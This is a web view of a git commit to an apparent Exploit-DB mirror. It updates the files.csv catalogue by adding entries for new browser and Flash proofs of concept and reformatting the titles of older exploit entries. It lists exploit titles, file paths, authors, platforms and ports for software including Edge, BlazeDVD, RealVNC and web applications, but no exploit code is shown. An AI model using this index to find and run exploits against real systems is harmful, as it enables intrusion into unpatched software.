bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2017-08-18

Browse source 
21 new exploits

Microsoft Office Products - Array Index Bounds Error (Unpatched) (PoC)
Microsoft Office Products - Array Index Bounds Error (PoC)

JAD java Decompiler 1.5.8g - (argument) Local Crash
JAD java Decompiler 1.5.8g - 'argument' Local Crash
Microsoft Edge Chakra - 'PreVisitCatch' Missing Call
Microsoft Edge Chakra - 'chakra!Js::GlobalObject' Integer overflow
Microsoft Edge Chakra - Buffer Overflow
Microsoft Edge Chakra - NULL Pointer Dereference
Microsoft Edge Chakra - Heap Buffer Overflow
Microsoft Edge Chakra - 'InterpreterStackFrame::ProcessLinkFailedAsmJsModule' Incorrectly Re-parses
Microsoft Edge Chakra - Incorrect Usage of 'PushPopFrameHelper' in 'InterpreterStackFrame::ProcessLinkFailedAsmJsModule'
Microsoft Edge Chakra - Incorrect Usage of 'TryUndeleteProperty'
Microsoft Edge Chakra - 'EmitAssignment' uses the 'this' Register Without Initializing
Microsoft Edge Chakra - Incorrect JIT Optimization with TypedArray Setter #2
Microsoft Edge Chakra - 'JavascriptArray::ConcatArgs' Type Confusion
Microsoft Edge Chakra - 'JavascriptFunction::EntryCall' Fails to Handle 'CallInfo' Properly
Microsoft Edge Chakra - Uninitialized Arguments
Microsoft Edge Chakra - Uninitialized Arguments (2)
Microsoft Edge Chakra - 'EmitNew' Integer Overflow
Microsoft Edge 40.15063.0.0 Chakra - Incorrect JIT Optimization with TypedArray Setter #3
Adobe Flash - Invoke Accesses Trait Out-of-Bounds
Microsoft Edge - Out-of-Bounds Access when Fetching Source

Audiotran 1.4.1 - Direct RET Buffer Overflow
Audiotran 1.4.1 - Buffer Overflow (Direct RET)

GSM SIM Utility 5.15 - Local Exploit Direct Ret ver
GSM SIM Utility 5.15 - Local Exploit (Direct RET)

DVD X Player 5.5.0 Pro / Standard - Universal Exploit (ASLR + DEP Bypass)
DVD X Player 5.5.0 Professional / Standard - '.plf' File Universal Exploit (ASLR + DEP Bypass)

CVS Kit CVS Server 1.10.8 - Checkin.prog Binary Execution
CVS Kit CVS Server 1.10.8 - 'Checkin.prog' Binary Execution
BlazeVideo HDTV Player 6.6 Professional - Direct Retn Exploit
Aviosoft Digital TV Player Professional 1.x - Direct Retn Exploit
BlazeVideo HDTV Player 6.6 Professional - Exploit (Direct Retn)
Aviosoft Digital TV Player Professional 1.x - '.PLF' Exploit (Direct Retn)

BlazeDVD 6.1 - PLF Exploit (DEP + ASLR Bypass) (Metasploit)
BlazeDVD 6.1 - '.PLF' File Exploit (DEP + ASLR Bypass) (Metasploit)

AudioCoder 0.8.22 - '.m3u' Direct Retn Buffer Overflow
AudioCoder 0.8.22 - '.m3u' Buffer Overflow (Direct Retn)

AudioCoder 0.8.22 - '.lst' Direct Retn Buffer Overflow
AudioCoder 0.8.22 - '.lst' Buffer Overflow (Direct Retn)

BlazeDVD Pro Player 6.1 - Stack Based Buffer Overflow (Direct Ret)
BlazeDVD Pro Player 6.1 - Stack Based Buffer Overflow (Direct RET)

BlazeDVD Pro 7.0 - '.plf' Buffer Overflow (SEH)
BlazeDVD Pro Player 7.0 - '.plf' Buffer Overflow (SEH)

BlazeDVD Pro 7.0 - '.plf' Stack Based Buffer Overflow (Direct RET)
BlazeDVD Pro Player 7.0 - '.plf' Stack Based Buffer Overflow (Direct RET)

Apple Mac OSX Install.Framework - SUID root Runner Binary Privilege Escalation
Apple Mac OSX Install.Framework - SUID Root Runner Binary Privilege Escalation

Xamarin Studio for Mac 6.2.1 (build 3)/6.3 (build 863) - Privilege Escalation
Xamarin Studio for Mac 6.2.1 (build 3) / 6.3 (build 863) - Privilege Escalation

RealVNC 4.1.0 < 4.1.1 - VNC Null Authentication Bypass (Patched EXE)
RealVNC 4.1.0 < 4.1.1 - VNC Null Authentication Bypass

Symphony 1.7.01 - (non-patched) Remote Code Execution
Symphony 1.7.01 (non-patched) - Remote Code Execution
Binary Board System 0.2.5 - reply.pl Multiple Parameter Cross-Site Scripting
Binary Board System 0.2.5 - stats.pl Multiple Parameter Cross-Site Scripting
Binary Board System 0.2.5 - toc.pl board Parameter Cross-Site Scripting
Binary Board System 0.2.5 - 'reply.pl' Multiple Parameter Cross-Site Scripting
Binary Board System 0.2.5 - 'stats.pl' Multiple Parameter Cross-Site Scripting
Binary Board System 0.2.5 - 'toc.pl' 'board' Parameter Cross-Site Scripting

Orchard 1.3.9 - 'ReturnUrl' Parameter URI redirection
Orchard 1.3.9 - 'ReturnUrl' Parameter URI Redirection

WebsitePanel - 'ReturnUrl' Parameter URI redirection
WebsitePanel - 'ReturnUrl' Parameter URI Redirection
Online Quiz Project 1.0 - SQL Injection
Photogallery Project 1.0 - SQL Injection
Doctor Patient Project 1.0 - SQL Injection
This commit is contained in:
Offensive Security 2017-08-18 05:01:20 +00:00
parent d873f7500d
commit 1a85ec2c87
23 changed files with 3069 additions and 25 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

67
files.csv
View file

@ -306,7 +306,7 @@ id,file,description,date,author,platform,type,port
1604,platforms/windows/dos/1604.html,"Microsoft Internet Explorer 6 - 'mshtml.dll checkbox' Crash",2006-03-22,"Stelian Ene",windows,dos,0
1613,platforms/windows/dos/1613.c,"Vavoom 1.19.1 - Multiple Vulnerabilities/Denial of Service",2006-03-26,"Luigi Auriemma",windows,dos,0
1614,platforms/windows/dos/1614.c,"csDoom 0.7 - Multiple Vulnerabilities/Denial of Service",2006-03-26,"Luigi Auriemma",windows,dos,0
1615,platforms/windows/dos/1615.txt,"Microsoft Office Products - Array Index Bounds Error (Unpatched) (PoC)",2006-03-27,posidron,windows,dos,0
1615,platforms/windows/dos/1615.txt,"Microsoft Office Products - Array Index Bounds Error (PoC)",2006-03-27,posidron,windows,dos,0
1622,platforms/multiple/dos/1622.pl,"RealPlayer 10.5 (6.0.12.1040-1348) - SWF Buffer Overflow (PoC)",2006-03-28,"Federico L. Bossi Bonin",multiple,dos,0
1633,platforms/windows/dos/1633.c,"Total Commander 6.x - 'unacev2.dll' Buffer Overflow (PoC)",2006-04-02,darkeagle,windows,dos,0
1634,platforms/linux/dos/1634.pl,"mpg123 0.59r - Malformed .mp3 (SIGSEGV) (PoC)",2006-04-02,nitr0us,linux,dos,0
@ -1423,7 +1423,7 @@ id,file,description,date,author,platform,type,port
11639,platforms/windows/dos/11639.txt,"Google Chrome 4.0.249 - XML Denial of Service (PoC)",2010-03-06,Blade,windows,dos,0
11644,platforms/multiple/dos/11644.py,"Flare 0.6 - Local Heap Overflow Denial of Service",2010-03-06,l3D,multiple,dos,0
11652,platforms/windows/dos/11652.py,"TopDownloads MP3 Player 1.0 - '.m3u' Crash Exploit",2010-03-07,l3D,windows,dos,0
11669,platforms/windows/dos/11669.py,"JAD java Decompiler 1.5.8g - (argument) Local Crash",2010-03-09,l3D,windows,dos,0
11669,platforms/windows/dos/11669.py,"JAD java Decompiler 1.5.8g - 'argument' Local Crash",2010-03-09,l3D,windows,dos,0
11670,platforms/windows/dos/11670.py,"JAD java Decompiler 1.5.8g - '.class' Stack Overflow Denial of Service",2010-03-09,l3D,windows,dos,0
11705,platforms/multiple/dos/11705.c,"FreeBSD and OpenBSD 'ftpd' - Null Pointer Dereference Denial of Service",2010-03-12,kingcope,multiple,dos,0
11706,platforms/windows/dos/11706.py,"Media Player classic StatsReader - '.stats' Stack Buffer Overflow (PoC)",2010-03-12,ITSecTeam,windows,dos,0
@ -5641,6 +5641,24 @@ id,file,description,date,author,platform,type,port
42433,platforms/linux/dos/42433.txt,"WildMIDI 0.4.2 - Multiple Vulnerabilities",2017-08-08,qflb.wu,linux,dos,0
42445,platforms/win_x86-64/dos/42445.html,"Microsoft Edge 38.14393.1066.0 - 'textarea.defaultValue' Memory Disclosure",2017-08-10,"Google Security Research",win_x86-64,dos,0
42451,platforms/windows/dos/42451.py,"Tomabo MP4 Converter 3.19.15 - Denial of Service",2017-08-13,"Andy Bowden",windows,dos,0
42464,platforms/windows/dos/42464.html,"Microsoft Edge Chakra - 'PreVisitCatch' Missing Call",2017-08-17,"Google Security Research",windows,dos,0
42465,platforms/windows/dos/42465.html,"Microsoft Edge Chakra - 'chakra!Js::GlobalObject' Integer overflow",2017-08-17,"Huang Anwen",windows,dos,0
42466,platforms/windows/dos/42466.html,"Microsoft Edge Chakra - Buffer Overflow",2017-08-17,"Huang Anwen",windows,dos,0
42467,platforms/windows/dos/42467.html,"Microsoft Edge Chakra - NULL Pointer Dereference",2017-08-17,"Huang Anwen",windows,dos,0
42468,platforms/windows/dos/42468.html,"Microsoft Edge Chakra - Heap Buffer Overflow",2017-08-17,"Huang Anwen",windows,dos,0
42469,platforms/windows/dos/42469.html,"Microsoft Edge Chakra - 'InterpreterStackFrame::ProcessLinkFailedAsmJsModule' Incorrectly Re-parses",2017-08-17,"Google Security Research",windows,dos,0
42470,platforms/windows/dos/42470.html,"Microsoft Edge Chakra - Incorrect Usage of 'PushPopFrameHelper' in 'InterpreterStackFrame::ProcessLinkFailedAsmJsModule'",2017-08-17,"Google Security Research",windows,dos,0
42471,platforms/windows/dos/42471.html,"Microsoft Edge Chakra - Incorrect Usage of 'TryUndeleteProperty'",2017-08-17,"Google Security Research",windows,dos,0
42472,platforms/windows/dos/42472.html,"Microsoft Edge Chakra - 'EmitAssignment' uses the 'this' Register Without Initializing",2017-08-17,"Google Security Research",windows,dos,0
42473,platforms/windows/dos/42473.html,"Microsoft Edge Chakra - Incorrect JIT Optimization with TypedArray Setter #2",2017-08-17,"Google Security Research",windows,dos,0
42474,platforms/windows/dos/42474.html,"Microsoft Edge Chakra - 'JavascriptArray::ConcatArgs' Type Confusion",2017-08-17,"Google Security Research",windows,dos,0
42475,platforms/windows/dos/42475.html,"Microsoft Edge Chakra - 'JavascriptFunction::EntryCall' Fails to Handle 'CallInfo' Properly",2017-08-17,"Google Security Research",windows,dos,0
42476,platforms/windows/dos/42476.html,"Microsoft Edge Chakra - Uninitialized Arguments",2017-08-17,"Google Security Research",windows,dos,0
42477,platforms/windows/dos/42477.html,"Microsoft Edge Chakra - Uninitialized Arguments (2)",2017-08-17,"Google Security Research",windows,dos,0
42478,platforms/windows/dos/42478.html,"Microsoft Edge Chakra - 'EmitNew' Integer Overflow",2017-08-17,"Google Security Research",windows,dos,0
42479,platforms/windows/dos/42479.html,"Microsoft Edge 40.15063.0.0 Chakra - Incorrect JIT Optimization with TypedArray Setter #3",2017-08-17,"Google Security Research",windows,dos,0
42480,platforms/windows/dos/42480.txt,"Adobe Flash - Invoke Accesses Trait Out-of-Bounds",2017-08-17,"Google Security Research",windows,dos,0
42481,platforms/windows/dos/42481.js,"Microsoft Edge - Out-of-Bounds Access when Fetching Source",2017-08-17,"Google Security Research",windows,dos,0
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@ -6644,7 +6662,7 @@ id,file,description,date,author,platform,type,port
11152,platforms/windows/local/11152.py,"Google SketchUp 7.1.6087 - 'lib3ds' 3DS Importer Memory Corruption",2010-01-16,mr_me,windows,local,0
11154,platforms/windows/local/11154.py,"BS.Player 2.51 - Universal Overflow (SEH)",2010-01-16,Dz_attacker,windows,local,0
11161,platforms/windows/local/11161.pl,"Rosoft Media Player 4.4.4 - Buffer Overflow (SEH) (1)",2010-01-16,Red-D3v1L,windows,local,0
11171,platforms/windows/local/11171.pl,"Audiotran 1.4.1 - Direct RET Buffer Overflow",2010-01-17,jacky,windows,local,0
11171,platforms/windows/local/11171.pl,"Audiotran 1.4.1 - Buffer Overflow (Direct RET)",2010-01-17,jacky,windows,local,0
11174,platforms/windows/local/11174.c,"VideoLAN VLC Media Player 0.8.6 a/b/c/d (Win32 Universal) - '.ass' Buffer Overflow",2010-01-17,"fl0 fl0w",windows,local,0
11191,platforms/windows/local/11191.pl,"Millenium MP3 Studio 1.x - '.m3u' Local Stack Overflow",2010-01-19,NeoCortex,windows,local,0
11199,platforms/windows/local/11199.txt,"Microsoft Windows NT/2000/2003/2008/XP/Vista/7 - User Mode to Ring Escalation (KiTrap0D) (MS10-015)",2010-01-19,"Tavis Ormandy",windows,local,0
@ -6772,7 +6790,7 @@ id,file,description,date,author,platform,type,port
14191,platforms/windows/local/14191.pl,"ASX to MP3 Converter 3.1.2.1 - Local Buffer Overflow (SEH)",2010-07-03,Madjix,windows,local,0
14215,platforms/windows/local/14215.txt,"SasCam 2.7 - ActiveX Head Buffer Overflow",2010-07-05,blake,windows,local,0
14256,platforms/windows/local/14256.txt,"HP OpenView Network Node Manager (OV NNM) 7.53 - 'ovwebsnmpsrv.exe' Buffer Overflow (SEH)",2010-07-07,bitform,windows,local,0
14258,platforms/windows/local/14258.py,"GSM SIM Utility 5.15 - Local Exploit Direct Ret ver",2010-07-07,chap0,windows,local,0
14258,platforms/windows/local/14258.py,"GSM SIM Utility 5.15 - Local Exploit (Direct RET)",2010-07-07,chap0,windows,local,0
14339,platforms/linux/local/14339.sh,"Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Escalation (2)",2010-07-12,anonymous,linux,local,0
14352,platforms/windows/local/14352.rb,"ASX to MP3 Converter 3.1.2.1 - (SEH) Multiple OS ASLR + DEP Bypass (Metasploit)",2010-07-13,Node,windows,local,0
14361,platforms/windows/local/14361.py,"Microsoft Excel - 0x5D record Stack Overflow (MS10-038)",2010-07-14,webDEViL,windows,local,0
@ -7140,7 +7158,7 @@ id,file,description,date,author,platform,type,port
17735,platforms/windows/local/17735.pl,"Yahoo! player 1.5 - '.m3u' Universal Buffer Overflow (SEH)",2011-08-28,"D3r K0n!G",windows,local,0
17744,platforms/windows/local/17744.pl,"Mini-stream Ripper 2.9.7.273 - '.m3u' Universal Buffer Overflow",2011-08-29,"D3r K0n!G",windows,local,0
17745,platforms/windows/local/17745.pl,"DVD X Player 5.5 Professional - '.plf' Universal Buffer Overflow",2011-08-29,"D3r K0n!G",windows,local,0
17754,platforms/windows/local/17754.c,"DVD X Player 5.5.0 Pro / Standard - Universal Exploit (ASLR + DEP Bypass)",2011-08-30,sickness,windows,local,0
17754,platforms/windows/local/17754.c,"DVD X Player 5.5.0 Professional / Standard - '.plf' File Universal Exploit (ASLR + DEP Bypass)",2011-08-30,sickness,windows,local,0
17770,platforms/windows/local/17770.rb,"DVD X Player 5.5 - '.plf' Playlist Buffer Overflow (Metasploit)",2011-09-01,Metasploit,windows,local,0
17787,platforms/linux/local/17787.c,"Linux Kernel < 2.6.36.2 (Ubuntu 10.04) - 'Half-Nelson.c' Econet Privilege Escalation",2011-09-05,"Jon Oberheide",linux,local,0
17777,platforms/windows/local/17777.rb,"Apple QuickTime - PICT PnSize Buffer Overflow (Metasploit)",2011-09-03,Metasploit,windows,local,0
@ -7589,7 +7607,7 @@ id,file,description,date,author,platform,type,port
20092,platforms/cgi/local/20092.txt,"Sean MacGuire Big Brother 1.0/1.3/1.4 - CGI File Creation",2001-06-11,xternal,cgi,local,0
20093,platforms/linux/local/20093.c,"Stanley T. Shebs Xconq 7.2.2 - xconq Buffer Overflow",2000-06-22,V9,linux,local,0
20107,platforms/unix/local/20107.txt,"CVS Kit CVS Server 1.10.8 - Instructed File Create",2000-07-28,"Tanaka Akira",unix,local,0
20108,platforms/unix/local/20108.txt,"CVS Kit CVS Server 1.10.8 - Checkin.prog Binary Execution",2000-06-28,"Tanaka Akira",unix,local,0
20108,platforms/unix/local/20108.txt,"CVS Kit CVS Server 1.10.8 - 'Checkin.prog' Binary Execution",2000-06-28,"Tanaka Akira",unix,local,0
20116,platforms/windows/local/20116.py,"Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 - Buffer Overflow (ASLR + DEP Bypass)",2012-07-27,"Ptrace Security",windows,local,0
20126,platforms/irix/local/20126.c,"IRIX 6.5.x - GR_OSView Buffer Overflow",1997-01-01,"Last Stage of Delirium",irix,local,0
20127,platforms/irix/local/20127.c,"SGI IRIX 6.2 libgl.so - Buffer Overflow",1997-09-01,"Last Stage of Delirium",irix,local,0
@ -8072,8 +8090,8 @@ id,file,description,date,author,platform,type,port
22923,platforms/unix/local/22923.c,"Tolis Group BRU 17.0 - Privilege Escalation (1)",2003-07-16,DVDMAN,unix,local,0
22924,platforms/unix/local/22924.c,"Tolis Group BRU 17.0 - Privilege Escalation (2)",2003-07-16,nic,unix,local,0
22928,platforms/linux/local/22928.pl,"mcrypt 2.5.8 - Stack Based Overflow",2012-11-26,Tosh,linux,local,0
22931,platforms/windows/local/22931.py,"BlazeVideo HDTV Player 6.6 Professional - Direct Retn Exploit",2012-11-26,Nezim,windows,local,0
22932,platforms/windows/local/22932.py,"Aviosoft Digital TV Player Professional 1.x - Direct Retn Exploit",2012-11-26,Nezim,windows,local,0
22931,platforms/windows/local/22931.py,"BlazeVideo HDTV Player 6.6 Professional - Exploit (Direct Retn)",2012-11-26,Nezim,windows,local,0
22932,platforms/windows/local/22932.py,"Aviosoft Digital TV Player Professional 1.x - '.PLF' Exploit (Direct Retn)",2012-11-26,Nezim,windows,local,0
23007,platforms/windows/local/23007.rb,"Microsoft Windows - AlwaysInstallElevated MSI (Metasploit)",2012-11-29,Metasploit,windows,local,0
22939,platforms/unix/local/22939.pl,"GNU GNATS 3.113.1_6 - Queue-PR Database Command Line Option Buffer Overflow",2003-07-21,inv[at]dtors,unix,local,0
22971,platforms/linux/local/22971.txt,"ManDB Utility 2.3/2.4 - Local Buffer Overflow",2003-07-29,V9,linux,local,0
@ -8147,7 +8165,7 @@ id,file,description,date,author,platform,type,port
23740,platforms/linux/local/23740.c,"Samhain Labs 1.x - HSFTP Remote Format String",2004-02-23,priest@priestmaster.org,linux,local,0
23743,platforms/linux/local/23743.txt,"Platform Load Sharing Facility 4/5/6 - 'EAuth' Privilege Escalation",2003-02-23,"Tomasz Grabowski",linux,local,0
23759,platforms/linux/local/23759.pl,"MTools 3.9.x - 'MFormat' Privilege Escalation",2004-02-25,"Sebastian Krahmer",linux,local,0
23783,platforms/windows/local/23783.rb,"BlazeDVD 6.1 - PLF Exploit (DEP + ASLR Bypass) (Metasploit)",2012-12-31,"Craig Freyman",windows,local,0
23783,platforms/windows/local/23783.rb,"BlazeDVD 6.1 - '.PLF' File Exploit (DEP + ASLR Bypass) (Metasploit)",2012-12-31,"Craig Freyman",windows,local,0
23838,platforms/aix/local/23838.pl,"GNU Make For IBM AIX 4.3.3 - CC Path Local Buffer Overflow",2003-05-30,watercloud,aix,local,0
23840,platforms/aix/local/23840.pl,"AIX 4.3.3/5.x - Getlvcb Command Line Argument Buffer Overflow (1)",2003-05-30,watercloud,aix,local,0
23841,platforms/aix/local/23841.c,"AIX 4.3.3/5.x - Getlvcb Command Line Argument Buffer Overflow (2)",2004-03-17,mattox,aix,local,0
@ -8279,9 +8297,9 @@ id,file,description,date,author,platform,type,port
26403,platforms/windows/local/26403.py,"Mediacoder - '.m3u' Buffer Overflow (SEH)",2013-06-24,metacom,windows,local,0
26404,platforms/windows/local/26404.py,"Mediacoder PMP Edition 0.8.17 - '.m3u' Buffer Overflow",2013-06-24,metacom,windows,local,0
26409,platforms/windows/local/26409.py,"aSc Timetables 2013 - Stack Buffer Overflow",2013-06-24,Dark-Puzzle,windows,local,0
26411,platforms/windows/local/26411.py,"AudioCoder 0.8.22 - '.m3u' Direct Retn Buffer Overflow",2013-06-24,Onying,windows,local,0
26411,platforms/windows/local/26411.py,"AudioCoder 0.8.22 - '.m3u' Buffer Overflow (Direct Retn)",2013-06-24,Onying,windows,local,0
26418,platforms/windows/local/26418.rb,"Novell Client 4.91 SP4 - 'nwfs.sys' Privilege Escalation (Metasploit)",2013-06-24,Metasploit,windows,local,0
26448,platforms/windows/local/26448.py,"AudioCoder 0.8.22 - '.lst' Direct Retn Buffer Overflow",2013-06-26,Onying,windows,local,0
26448,platforms/windows/local/26448.py,"AudioCoder 0.8.22 - '.lst' Buffer Overflow (Direct Retn)",2013-06-26,Onying,windows,local,0
26451,platforms/linux/local/26451.rb,"ZPanel zsudo - Privilege Escalation (Metasploit)",2013-06-26,Metasploit,linux,local,0
26452,platforms/win_x86/local/26452.rb,"Novell Client 2 SP3 - 'nicm.sys' Privilege Escalation (Metasploit)",2013-06-26,Metasploit,win_x86,local,0
26454,platforms/freebsd/local/26454.rb,"FreeBSD 9 - Address Space Manipulation Privilege Escalation (Metasploit)",2013-06-26,Metasploit,freebsd,local,0
@ -8300,7 +8318,7 @@ id,file,description,date,author,platform,type,port
26752,platforms/windows/local/26752.s,"Multiple Vendor BIOS - Keyboard Buffer Password Persistence Weakness (1)",2005-12-06,Endrazine,windows,local,0
26753,platforms/unix/local/26753.c,"Multiple Vendor BIOS - Keyboard Buffer Password Persistence Weakness (2)",2005-12-06,Endrazine,unix,local,0
26805,platforms/windows/local/26805.rb,"Corel PDF Fusion - Stack Buffer Overflow (Metasploit)",2013-07-13,Metasploit,windows,local,0
26889,platforms/windows/local/26889.pl,"BlazeDVD Pro Player 6.1 - Stack Based Buffer Overflow (Direct Ret)",2013-07-16,PuN1sh3r,windows,local,0
26889,platforms/windows/local/26889.pl,"BlazeDVD Pro Player 6.1 - Stack Based Buffer Overflow (Direct RET)",2013-07-16,PuN1sh3r,windows,local,0
40385,platforms/netbsd_x86/local/40385.rb,"NetBSD mail.local(8) - Privilege Escalation (Metasploit)",2016-09-15,Metasploit,netbsd_x86,local,0
26950,platforms/windows/local/26950.c,"Symantec Workspace Virtualization 6.4.1895.0 - Kernel Mode Privilege Escalation",2013-07-18,MJ0011,windows,local,0
26970,platforms/windows/local/26970.c,"McAfee VirusScan 8.0 - Path Specification Privilege Escalation",2005-12-22,"Reed Arvin",windows,local,0
@ -8364,7 +8382,7 @@ id,file,description,date,author,platform,type,port
29070,platforms/windows/local/29070.c,"Computer Associates Personal Firewall 9.0 - HIPS Driver 'kmxstart.sys' Privilege Escalation",2006-11-16,"Ruben Santamarta",windows,local,0
29102,platforms/openbsd/local/29102.c,"OpenBSD 3.9/4.0 - ld.so Local Environment Variable Clearing",2006-11-20,"Mark Dowd",openbsd,local,0
29125,platforms/windows/local/29125.txt,"Avira Internet Security - 'avipbb.sys' Filter Bypass / Privilege Escalation",2013-10-22,"Ahmad Moghimi",windows,local,0
34371,platforms/windows/local/34371.py,"BlazeDVD Pro 7.0 - '.plf' Buffer Overflow (SEH)",2014-08-20,metacom,windows,local,0
34371,platforms/windows/local/34371.py,"BlazeDVD Pro Player 7.0 - '.plf' Buffer Overflow (SEH)",2014-08-20,metacom,windows,local,0
29190,platforms/osx/local/29190.txt,"Apple Mac OSX 10.4.x - Mach-O Binary Loading Integer Overflow",2006-11-26,LMH,osx,local,0
29194,platforms/osx/local/29194.c,"Apple Mac OSX 10.4.x - AppleTalk AIOCRegLocalZN IOCTL Stack Buffer Overflow",2006-11-27,LMH,osx,local,0
29201,platforms/osx/local/29201.c,"Apple Mac OSX 10.4.x - Shared_Region_Make_Private_Np Kernel Function Local Memory Corruption",2006-11-29,LMH,osx,local,0
@ -8560,7 +8578,7 @@ id,file,description,date,author,platform,type,port
34313,platforms/solaris/local/34313.txt,"Oracle Solaris - 'nfslogd' Insecure Temporary File Creation",2010-07-13,"Frank Stuart",solaris,local,0
34314,platforms/solaris/local/34314.sh,"Oracle Solaris Management Console - WBEM Insecure Temporary File Creation",2010-07-13,"Frank Stuart",solaris,local,0
34333,platforms/windows/local/34333.rb,"Oracle VM VirtualBox Guest Additions 4.3.10r93012 - 'VBoxGuest.sys' Privilege Escalation (Metasploit)",2014-08-13,Metasploit,windows,local,0
34331,platforms/windows/local/34331.py,"BlazeDVD Pro 7.0 - '.plf' Stack Based Buffer Overflow (Direct RET)",2014-08-12,"Giovanni Bartolomucci",windows,local,0
34331,platforms/windows/local/34331.py,"BlazeDVD Pro Player 7.0 - '.plf' Stack Based Buffer Overflow (Direct RET)",2014-08-12,"Giovanni Bartolomucci",windows,local,0
34421,platforms/linux/local/34421.c,"glibc - NUL Byte gconv_translit_find Off-by-One Exploit",2014-08-27,"taviso and scarybeasts",linux,local,0
34489,platforms/windows/local/34489.py,"HTML Help Workshop 1.4 - Local Buffer Overflow (SEH)",2014-08-31,mr.pr0n,windows,local,0
34512,platforms/windows/local/34512.py,"LeapFTP 3.1.0 - URL Handling Buffer Overflow (SEH)",2014-09-01,k3170makan,windows,local,0
@ -8740,7 +8758,7 @@ id,file,description,date,author,platform,type,port
38036,platforms/osx/local/38036.rb,"Apple Mac OSX Entitlements - 'Rootpipe' Privilege Escalation (Metasploit)",2015-08-31,Metasploit,osx,local,0
38087,platforms/windows/local/38087.pl,"AutoCAD DWG and DXF To PDF Converter 2.2 - Buffer Overflow",2015-09-06,"Robbie Corley",windows,local,0
38089,platforms/osx/local/38089.txt,"Disconnect.me Mac OSX Client 2.0 - Privilege Escalation",2015-09-06,"Kristian Erik Hermansen",osx,local,0
38136,platforms/osx/local/38136.txt,"Apple Mac OSX Install.Framework - SUID root Runner Binary Privilege Escalation",2015-09-10,"Google Security Research",osx,local,0
38136,platforms/osx/local/38136.txt,"Apple Mac OSX Install.Framework - SUID Root Runner Binary Privilege Escalation",2015-09-10,"Google Security Research",osx,local,0
38137,platforms/osx/local/38137.txt,"Apple Mac OSX Install.Framework - Arbitrary mkdir / unlink and chown to Admin Group",2015-09-10,"Google Security Research",osx,local,0
38095,platforms/windows/local/38095.pl,"VeryPDF HTML Converter 2.0 - SEH/ToLower() Bypass Buffer Overflow",2015-09-07,"Robbie Corley",windows,local,0
38138,platforms/osx/local/38138.txt,"Apple Mac OSX - Install.framework suid Helper Privilege Escalation",2015-09-10,"Google Security Research",osx,local,0
@ -9180,7 +9198,7 @@ id,file,description,date,author,platform,type,port
42429,platforms/windows/local/42429.py,"Microsoft Windows - '.LNK' Shortcut File Code Execution",2017-08-06,nixawk,windows,local,0
42432,platforms/windows/local/42432.cpp,"Microsoft Windows 7 SP1 x86 - GDI Palette Objects Local Privilege Escalation (MS17-017)",2017-07-19,Saif,windows,local,0
42435,platforms/win_x86-64/local/42435.txt,"Microsoft Windows 8.1 (x64) - RGNOBJ Integer Overflow (MS16-098) (2)",2017-08-08,SensePost,win_x86-64,local,0
42454,platforms/macos/local/42454.txt,"Xamarin Studio for Mac 6.2.1 (build 3)/6.3 (build 863) - Privilege Escalation",2017-08-14,Securify,macos,local,0
42454,platforms/macos/local/42454.txt,"Xamarin Studio for Mac 6.2.1 (build 3) / 6.3 (build 863) - Privilege Escalation",2017-08-14,Securify,macos,local,0
42455,platforms/windows/local/42455.py,"ALLPlayer 7.4 - Buffer Overflow (SEH Unicode)",2017-08-15,f3ci,windows,local,0
42456,platforms/windows/local/42456.py,"Internet Download Manager 6.28 Build 17 - Buffer Overflow (SEH Unicode)",2017-08-15,f3ci,windows,local,0
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
@ -9644,7 +9662,7 @@ id,file,description,date,author,platform,type,port
1776,platforms/windows/remote/1776.c,"Medal of Honor - (getinfo) Remote Buffer Overflow",2006-05-10,RunningBon,windows,remote,12203
1787,platforms/windows/remote/1787.py,"freeSSHd 1.0.9 - Key Exchange Algorithm Buffer Overflow",2006-05-15,"Tauqeer Ahmad",windows,remote,22
1788,platforms/windows/remote/1788.pm,"PuTTy.exe 0.53 - (Validation) Remote Buffer Overflow (Metasploit)",2006-05-15,y0,windows,remote,0
1791,platforms/multiple/remote/1791.patch,"RealVNC 4.1.0 < 4.1.1 - VNC Null Authentication Bypass (Patched EXE)",2006-05-16,redsand,multiple,remote,5900
1791,platforms/multiple/remote/1791.patch,"RealVNC 4.1.0 < 4.1.1 - VNC Null Authentication Bypass",2006-05-16,redsand,multiple,remote,5900
1794,platforms/multiple/remote/1794.pm,"RealVNC 4.1.0 < 4.1.1 - VNC Null Authentication Bypass (Metasploit)",2006-05-15,"H D Moore",multiple,remote,5900
1799,platforms/multiple/remote/1799.txt,"RealVNC 4.1.0 < 4.1.1 - VNC Null Authentication Scanner",2006-05-17,class101,multiple,remote,0
1813,platforms/linux/remote/1813.c,"Cyrus IMAPD 2.3.2 - 'pop3d' Remote Buffer Overflow (1)",2006-05-21,kingcope,linux,remote,110
@ -19855,7 +19873,7 @@ id,file,description,date,author,platform,type,port
6172,platforms/php/webapps/6172.pl,"Pligg CMS 9.9.0 - Remote Code Execution",2008-07-30,"GulfTech Security",php,webapps,0
6173,platforms/php/webapps/6173.txt,"Pligg CMS 9.9.0 - Cross-Site Scripting / Local File Inclusion / SQL Injection",2008-07-30,"GulfTech Security",php,webapps,0
6176,platforms/php/webapps/6176.txt,"PHPX 3.5.16 - Cookie Poisoning / Login Bypass",2008-07-31,gnix,php,webapps,0
6177,platforms/php/webapps/6177.php,"Symphony 1.7.01 - (non-patched) Remote Code Execution",2008-07-31,Raz0r,php,webapps,0
6177,platforms/php/webapps/6177.php,"Symphony 1.7.01 (non-patched) - Remote Code Execution",2008-07-31,Raz0r,php,webapps,0
6178,platforms/php/webapps/6178.php,"Coppermine Photo Gallery 1.4.18 - Local File Inclusion / Remote Code Execution",2008-07-31,EgiX,php,webapps,0
6179,platforms/php/webapps/6179.txt,"LetterIt 2 - 'Language' Parameter Local File Inclusion",2008-07-31,NoGe,php,webapps,0
